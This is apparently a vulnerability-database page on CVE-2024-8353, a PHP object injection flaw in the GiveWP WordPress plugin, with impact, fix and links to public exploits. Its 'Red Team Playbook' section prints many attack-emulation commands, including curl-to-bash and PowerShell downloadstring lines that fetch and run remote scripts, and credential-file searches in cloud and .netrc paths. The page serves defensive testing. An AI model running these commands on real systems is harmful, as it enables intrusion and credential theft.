CVE-2024-8353
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input in the GiveWP – Donation Plugin and Fundraising Platform for WordPress. The flaw arises from improper handling of serialized data within parameters such as 'give_title' and 'card_address', enabling injection of malicious PHP objects. The affected component is the deserialization logic in the donation processing functionality, which fails to adequately validate or sanitize user-supplied input before unserialization.
Vulnerability Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP code on the server, delete arbitrary files, and potentially take full control of the affected WordPress site. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), enabling remote exploitation over the network. This can lead to data breaches, service disruption, and compromise of the hosting environment, severely impacting business operations and data integrity.
Solution
Users should upgrade the GiveWP – Donation Plugin and Fundraising Platform to version 3.16.2 or later, where the vulnerability has been fully addressed with enhanced input validation and deserialization hardening. Detailed patch information and version-specific fixes are documented in the WordPress plugin repository changelog and Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c. No additional workarounds are recommended beyond applying the official update.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the GiveWP Donation Plugin and Fundraising Platform for WordPress stems from a critical flaw in its handling of PHP object serialization. Specifically, the issue arises from the deserialization of untrusted input through various parameters, such as 'give_title' and 'card_address'. This vulnerability allows attackers to inject malicious PHP objects, which can lead to severe consequences. The presence of a "Property-Oriented Programming" (POP) chain further exacerbates the situation, enabling attackers to execute arbitrary code and delete files on the server. The exploitation of this vulnerability is particularly concerning due to its potential to compromise the integrity and confidentiality of the affected systems.
Attack vectors for this vulnerability are notably straightforward, as it allows unauthenticated attackers to exploit the deserialization flaw without requiring any prior authentication. By crafting malicious requests that include specially formatted input for the vulnerable parameters, an attacker can manipulate the deserialization process to instantiate arbitrary PHP objects. This manipulation can lead to remote code execution, where the attacker can execute commands on the server, potentially gaining full control over the affected WordPress instance. Additionally, the ability to delete arbitrary files can be leveraged to erase logs, backdoors, or any other evidence of the attack, complicating detection and response efforts.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the GiveWP plugin for fundraising and donation management. The potential for remote code execution means that attackers could gain unauthorized access to sensitive donor information, financial data, and other critical assets. This breach not only poses a direct financial risk but also threatens the reputation and trustworthiness of the organization. In a landscape where data breaches can lead to regulatory fines and loss of customer confidence, the implications of such an attack can be devastating. Furthermore, the ease of exploitation increases the likelihood of widespread attacks, making it a pressing concern for any organization using this plugin.
To detect and mitigate this vulnerability, organizations should prioritize updating the GiveWP plugin to the latest version, where significant patches have been applied. Regularly monitoring for updates and applying security patches is essential to protect against known vulnerabilities. Additionally, implementing web application firewalls (WAFs) can help filter out malicious requests that attempt to exploit this vulnerability. Organizations should also conduct regular security assessments and code reviews to identify and remediate potential weaknesses in their applications. Employing input validation and sanitization techniques can further reduce the risk of deserialization attacks by ensuring that only trusted input is processed by the application.
In conclusion, the vulnerability in the GiveWP Donation Plugin represents a serious threat to WordPress users, particularly those involved in fundraising activities. The combination of unauthenticated access, the ability to execute arbitrary code, and the potential for data breaches highlights the need for immediate action. Organizations must adopt a proactive approach to security, focusing on timely updates, robust detection mechanisms, and comprehensive mitigation strategies to safeguard their systems against such vulnerabilities. As the cybersecurity landscape continues to evolve, staying informed and prepared is crucial for maintaining the integrity and security of web applications.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Givewp | Givewp | All |
cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
GiveWP Unauthenticated Donation Process Exploit
exploits/multi/http/wp_givewp_rce
|
Villu Orav, EQSTLab, cuokon +2 | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
EQSTLab/CVE-2024-8353
GiveWP PHP Object Injection exploit
|
EQSTLab | 12 | 2 | 2024-09-30 | View |
|
0xb0mb3r/CVE-2024-8353-PoC
Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection
|
0xb0mb3r | 3 | 0 | 2024-08-21 | View |
Threat Feed
2 eventsPublic exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-8353 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3149290/give/tags/3.16.1/includes/process-donation.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3149290/give/tags/3.16.1/includes/admin/admin-actions.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3149290/give/tags/3.16.1/src/Helpers/Utils.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3157829/give/tags/3.16.2/includes/process-donation.php |